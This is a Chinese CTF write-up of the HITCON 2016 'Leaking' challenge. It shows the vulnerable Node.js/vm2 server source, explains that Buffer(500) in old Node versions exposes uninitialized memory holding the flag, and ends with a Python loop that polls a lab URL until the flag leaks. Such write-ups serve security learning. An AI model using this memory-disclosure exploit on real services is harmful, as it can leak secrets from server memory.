# [HITCON2016]Leaking
源码:
"use strict"; | |
var randomstring = require("randomstring"); | |
var express = require("express"); | |
var { | |
VM | |
} = require("vm2"); | |
var fs = require("fs"); | |
var app = express(); | |
var flag = require("./config.js").flag | |
app.get("/", function(req, res) { | |
res.header("Content-Type", "text/plain"); | |
/* Orange is so kind so he put the flag here. But if you can guess correctly :P */ | |
eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";") | |
if (req.query.data && req.query.data.length <= 12) { | |
var vm = new VM({ | |
timeout: 1000 | |
}); | |
console.log(req.query.data); | |
res.send("eval ->" + vm.run(req.query.data)); | |
} else { | |
res.send(fs.readFileSync(__filename).toString()); | |
} | |
}); | |
app.listen(3000, function() { | |
console.log("listening on port 3000!"); | |
}); |
意思基本上就是有个 POST 方法的 data 数据,输入的数据不能超过 12 个字符
执行结果与字符串 "eval ->" 连接起来,并作为 HTTP 响应发回。
低版本的node可以使用buffer()来查看内存,只要调用过的变量,都会存在内存中,那么我们可以构造paylaod读取内存
基本上就是一直 buffer (500) 查看内存,如果有 flag 就返回
exp 如下:
import requests | |
import time | |
url = 'http://9b4d4454-1713-42f4-9502-fe741e293347.node5.buuoj.cn:81/?data=Buffer(500)' | |
while True: | |
r = requests.get(url) | |
time.sleep(0.2) | |
print('trying') | |
if r.status_code == 200: | |
if 'flag{' in r.text: | |
print(r.text) | |
break |
